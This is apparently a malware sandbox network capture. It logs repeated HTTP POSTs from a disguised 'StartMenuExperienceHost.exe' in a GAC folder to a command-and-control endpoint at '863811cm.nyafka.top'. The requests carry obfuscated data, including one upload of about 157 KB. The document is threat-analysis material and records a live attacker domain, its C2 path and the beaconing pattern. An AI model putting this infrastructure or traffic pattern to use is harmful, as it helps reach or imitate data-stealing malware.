                                                                Data Ascii: PRXXTY]Q^ZUXQUZRWZXXUVQ]XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9(?+*?T&>;+ ^6+;Y(##?S$=R)(!W Z=;#Y$/\*
                                                                Oct 11, 2024 01:36:30.293142080 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:30.544817924 CEST591INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:30 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5IAFYLi6DprIu7Yvwa9nBX3sjYIMRfCvpRcvQ2KeGyxtX04RCJCXdPz7BdlGA5rwYEm9chACEH8baEA4Cpg2LunHt6dvIDwBeGs4hOaHcvbyKs1rYvDU5%2BRGH3DXdk90PmcH928j"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6ed50feb7ca6-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                2192.168.2.549772188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:36:30.702291965 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:31.051394939 CEST2584OUTData Raw: 50 59 5d 58 51 5f 58 52 5e 5a 55 58 51 5c 5a 58 57 5a 58 5f 55 56 51 5e 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: PY]XQ_XR^ZUXQ\ZXWZX_UVQ^XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9_(>/(;T'.,B<%$5;(#9S#4'->=$F51,^)#Y$/\*
                                                                Oct 11, 2024 01:36:31.163455009 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:31.416073084 CEST599INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:31 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rV6MWCQsOtbIX4U9tq1wa%2B7GpLiKRiaPMF49K%2FEZg5L9OALPf7KcdP8EAc%2BuzSp71GjXU44qJIQjQEFhkdhVk9pX3mU3uXoNLgEIRlAUBmkExs5%2FQrsP1iKhHbuPj2%2B1TaSB5LUD"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6eda786a17bd-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                3192.168.2.549780188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:36:31.591635942 CEST335OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                4192.168.2.549781188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:36:31.676393032 CEST335OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 1916
                                                                Expect: 100-continue
                                                                Connection: Keep-Alive
                                                                Oct 11, 2024 01:36:32.036931992 CEST1916OUTData Raw: 55 5a 5d 54 54 5b 5d 52 5e 5a 55 58 51 53 5a 5c 57 5e 58 59 55 57 51 58 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: UZ]TT[]R^ZUXQSZ\W^XYUWQXXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9]+[+90%(E+'5;Y+#47<$=9U=8,!!$)+#Y$/\*9
                                                                Oct 11, 2024 01:36:32.129529953 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:32.411843061 CEST733INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:32 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y1GLI8p90WEbLmdUZaC9vCT6cS4j9ulchGXmXhVJBZCcCe7LXYfc8oheFcQ9ScVtjKE1mgRugXQxT1FUrZXWLgoCNa4w52ZGz5OIGeXgsAHMRVlWl3T1SYv5FjhFBTVV9F0FENRF"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6ee079f9c35d-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 58 3d 2a 3a 10 23 10 0d 10 3b 0f 28 5b 3e 3d 03 01 2b 21 23 10 26 24 28 00 3a 12 29 1f 36 2b 30 1a 3d 3f 3d 02 24 2f 37 5a 2b 31 2a 51 03 1b 39 11 28 33 30 09 3c 21 32 02 3f 31 39 5d 26 33 31 0b 29 13 29 56 27 2d 25 04 21 21 23 0e 3e 12 24 0a 38 02 30 1b 28 2b 31 00 37 3b 2a 5f 08 13 39 13 3e 38 09 08 35 24 26 00 35 13 20 0f 20 29 29 0b 3e 17 03 08 24 30 2c 5c 3b 0c 20 1d 21 3c 3c 0d 22 3f 21 0a 21 3e 30 5a 31 12 22 5f 22 00 29 51 00 3f 54 52 0d 0a
                                                                Data Ascii: 98'X=*:#;([>=+!#&$(:)6+0=?=$/7Z+1*Q9(30<!2?19]&31))V'-%!!#>$80(+17;*_9>85$&5 ))>$0,\; !<<"?!!>0Z1"_")Q?TR
                                                                Oct 11, 2024 01:36:32.500174999 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Oct 11, 2024 01:36:32.500686884 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:32.596971035 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:32.597126007 CEST2584OUTData Raw: 55 59 5d 5c 51 5c 58 57 5e 5a 55 58 51 52 5a 5c 57 5b 58 55 55 5d 51 52 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: UY]\Q\XW^ZUXQRZ\W[XUU]QRXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:<$Y+:/W2;<7!(+U)V#4$'.-T(;8A6=#Y$/\*
                                                                Oct 11, 2024 01:36:32.847775936 CEST597INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:32 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AgMGXn6iO119hSVqbIwaidP%2BKUVmcKdGPZfkedvmLh6zYEGyQW%2FoLjRAU9hcaApi90PtogxpKR%2FQE8UZoKflJkBurnSBY14Jl8qPxc4veiFD3ZGPRxBN28ibHKsvvnKsoQ%2B5k0Bb"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6ee36c93c35d-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0
                                                                Oct 11, 2024 01:36:32.848304987 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 1916
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:32.944576979 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:32.944839001 CEST1916OUTData Raw: 50 5d 58 59 54 58 5d 51 5e 5a 55 58 51 56 5a 53 57 58 58 59 55 54 51 53 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P]XYTX]Q^ZUXQVZSWXXYUTQSXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9_+<Y+*&>0<C4^! ?-7$&-)W*+4"!>#Y$/\*-
                                                                Oct 11, 2024 01:36:33.253386974 CEST756INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:33 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y4AEygMXqEHuPKO1VVp9gj%2FCLuybDOyTaDGsxzK8BJFmUrBOIws1n5l3dqnA3S%2FgQdDaqieHqED%2Bo%2BGnVq0SfgHb8%2FPVW%2B%2BpGBxUWU46TFOm1%2F0tp8I%2FvpHjZvbuWSqjDSPBMog0"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6ee59eacc35d-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 24 00 3e 17 3e 10 23 10 20 05 2c 31 3c 59 29 3d 2d 00 29 32 27 59 32 1a 3f 5c 39 2f 29 56 22 15 01 04 29 2f 36 11 24 12 0e 03 28 21 2a 51 03 1b 39 5e 3f 20 27 56 29 21 25 5f 2b 0c 3e 00 24 55 26 1c 29 3e 32 0d 33 3e 22 1b 35 1f 0a 1f 29 5a 23 55 2c 2b 33 40 2a 28 03 04 23 11 2a 5f 08 13 3a 0f 2a 06 3c 1c 20 37 2d 5d 36 2e 3b 1f 35 39 04 53 29 17 25 0c 33 0a 27 00 2f 22 24 5f 23 3f 3f 57 21 2c 04 1f 20 3e 28 10 26 28 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98$>># ,1<Y)=-)2'Y2?\9/)V")/6$(!*Q9^? 'V)!%_+>$U&)>23>"5)Z#U,+3@*(#*_:*< 7-]6.;59S)%3'/"$_#??W!, >(&("_")Q?TR0
                                                                Oct 11, 2024 01:36:33.253664970 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:33.350882053 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:33.351051092 CEST2584OUTData Raw: 50 52 58 5d 54 5c 58 55 5e 5a 55 58 51 53 5a 5f 57 5c 58 55 55 5c 51 5f 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: PRX]T\XU^ZUXQSZ_W\XUU\Q_XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9^+.,+*+V&;*&?6($(U:7+Q$>9S(+ G51(+#Y$/\*9
                                                                Oct 11, 2024 01:36:33.655471087 CEST599INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:33 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P9vM7UGTaF%2BeleT1sZgcXV0HswO%2BfnwQebC5NFA%2F4yHz3jOcH1eS1t7N0Q2n5vbMic80nYJ%2FsvylzDJJV63OX8WO8q3EZt4Bue%2FTZmCShEQnnjNQ0QeFSM710E3oaHN2xgkkG9Jg"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6ee828fac35d-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0
                                                                Oct 11, 2024 01:36:33.655783892 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 1916
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:33.751580000 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:33.751743078 CEST1916OUTData Raw: 50 59 58 5e 54 5e 5d 51 5e 5a 55 58 51 56 5a 59 57 58 58 5e 55 50 51 59 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: PYX^T^]Q^ZUXQVZYWXX^UPQYXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:?=/<)/T%X8A?5^!?[< > '?V3>9U(;$!1#)#Y$/\*-
                                                                Oct 11, 2024 01:36:34.053121090 CEST740INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:34 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mxy3CupDE8aXaHNaQ1FFv6hSmTyldQ7LKW4KJNeMr%2BGu9COfxpG9nSwjkza9GsIPheeroyfuCfHHNXbAVOf5p77IX18rZhWQvcnTzG0hh5i72nGhaWpkARx4QK3sPIURmDtMc6Ef"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6eeaab51c35d-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 5c 3d 07 0f 0d 20 2d 34 05 3b 57 24 10 3e 2d 22 58 3c 0f 01 5e 31 1a 27 59 2e 05 3e 0b 22 2b 02 14 2a 02 00 58 24 02 27 5a 3f 1b 2a 51 03 1b 3a 02 2b 33 30 0d 28 0c 08 07 29 32 2a 04 27 20 35 06 2a 3d 21 54 24 58 39 07 35 1f 23 0d 29 02 02 0f 2c 38 34 1c 3d 2b 22 5c 37 3b 2a 5f 08 13 39 13 28 38 20 54 22 19 0b 5d 22 2d 11 56 20 3a 35 0f 3e 29 08 13 24 1d 0a 5e 2d 21 24 13 21 3f 2b 1e 35 3c 00 1e 21 2e 30 59 31 38 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98'\= -4;W$>-"X<^1'Y.>"+*X$'Z?*Q:+30()2*' 5*=!T$X95#),84=+"\7;*_9(8 T"]"-V :5>)$^-!$!?+5<!.0Y18"_")Q?TR0
                                                                Oct 11, 2024 01:36:34.053776979 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:34.149255991 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:34.149403095 CEST2584OUTData Raw: 55 59 5d 5e 54 59 58 5f 5e 5a 55 58 51 5c 5a 5f 57 5c 58 5b 55 5d 51 5c 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: UY]^TYX_^ZUXQ\Z_W\X[U]Q\XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9<-/<98&0<?#;+0" '+S3>>*/620^(+#Y$/\*
                                                                Oct 11, 2024 01:36:34.408701897 CEST601INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:34 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LowCGUf7wIK0%2BjbglyCKRrcpfa%2F%2FXeJO%2BuMoQYgi0l9GkTD%2FTODUpW2PJidhSVMeHtqCTZntxlT0a%2FcXGC3jQ3KHVZ1I5h1Q6xh6xidYiqT6ku2S454GFjl4sMkQ0VW0QMLKijk9"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6eed1d94c35d-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0
                                                                Oct 11, 2024 01:36:34.409012079 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 1892
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:34.504760027 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:34.504957914 CEST1892OUTData Raw: 55 5d 5d 5c 51 5f 58 56 5e 5a 55 58 51 5d 5a 5b 57 5b 58 5c 55 51 51 53 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: U]]\Q_XV^ZUXQ]Z[W[X\UQQSXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9<-0Z<:;1,<%5#X(U=S ?S$.2*(5!(+#Y$/\*
                                                                Oct 11, 2024 01:36:34.798048973 CEST750INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:34 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MlXGxNy2bQyYHto9fm74L7SSQUDkS8rIGWpdw7qIgMUo%2BMCCEB3169Zg%2B02RnUn1JVUt3rULweyBjURKkexMFW%2FGWAjEp%2B05HYJXO9fAr%2BxBvnhmSzduYbeZ2BuqPmC%2BlDHT1QIQ"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6eef5f97c35d-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 24 06 29 3a 32 52 23 10 0d 12 2f 31 2b 01 3d 3e 2d 06 3c 21 33 12 25 34 28 01 2e 2c 3e 0f 21 3b 3c 58 2a 02 3e 5a 30 3f 33 11 3f 31 2a 51 03 1b 39 5a 2b 0d 0a 08 28 0c 31 16 3c 32 3a 07 33 33 39 42 3d 3e 21 54 24 10 2a 58 22 1f 3c 53 29 2c 2b 1f 3b 38 2b 07 29 2b 2e 10 34 3b 2a 5f 08 13 3a 0d 3e 3b 23 0e 22 34 2a 00 21 3e 23 1f 20 3a 36 1a 3f 3a 2e 57 33 33 2c 5c 2f 21 3b 06 37 11 2f 1e 35 3c 3e 52 37 13 06 5c 25 02 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98$):2R#/1+=>-<!3%4(.,>!;<X*>Z0?3?1*Q9Z+(1<2:339B=>!T$*X"<S),+;8+)+.4;*_:>;#"4*!># :6?:.W33,\/!;7/5<>R7\%"_")Q?TR0
                                                                Oct 11, 2024 01:36:34.798899889 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:34.901029110 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:34.904246092 CEST2584OUTData Raw: 50 5b 5d 54 54 5f 58 52 5e 5a 55 58 51 52 5a 5a 57 58 58 55 55 54 51 5a 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P[]TT_XR^ZUXQRZZWXXUUTQZXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9\)>(X+$1@+C X5\?3!U#7;R'-9S=4G!!+>;#Y$/\*
                                                                Oct 11, 2024 01:36:35.165321112 CEST597INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:35 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6xyqXDxOE2SjV3s3mERyUg5rXV03tgfMtMn3tbl5i8OMg5CVxKPQwOnL%2BY9t6mAkyYnvRJXRU72jBXM94WP2Yaa30H9LLZJNHx%2F3uiytORMPJR2ydJubSbZirrx7Kuq%2FHOQ3TP%2BN"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6ef1ca6fc35d-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                5192.168.2.549782188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:36:31.846874952 CEST337OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 157336
